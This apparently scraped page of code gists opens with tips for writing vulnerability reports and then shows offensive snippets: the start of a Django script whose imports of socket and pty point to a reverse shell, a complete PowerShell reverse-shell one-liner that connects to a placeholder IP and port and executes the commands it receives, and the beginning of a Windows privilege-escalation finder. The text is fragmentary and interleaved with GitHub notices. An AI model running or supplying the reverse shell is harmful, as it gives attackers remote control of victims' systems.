- Use simple words and avoid complex phrases. Use headings for your report sections.
- Mention if authentication is required to exploit the issue.
- If authentication is required, elaborate on the privilege required (admin, guest etc.), if applicable
- Provide the URL where exploit payload is consumed and the parameter/header component which is affected
- Include HTTP request, responses for multi step bugs
- Steps to reproduce the issue should ideally have been written from the point of a user/attacker of the system.
- In the Steps to reproduce, avoid jumping directly to the URL/parameter being exploited. Don't do 1. Go to http://example.com/api/v1/something/23/, 2. Change 23 to -1. This will not provide context to the reader.
- If possible mention what you think the expected output should be and what you see instead
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from distutils.log import error | |
import sys, socket,os,pty | |
from django.conf import settings | |
from django.urls import include, re_path | |
from django.http import HttpResponse | |
settings.configure( | |
DEBUG=True, | |
ROOT_URLCONF=__name__ | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Usage: findelevate.py C:\Windows\System32\ | |
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx] | |
import sys | |
import os | |
import glob | |
import subprocess | |
if len(sys.argv) < 2: | |
print "Usage: findelevate.py <PATH>" |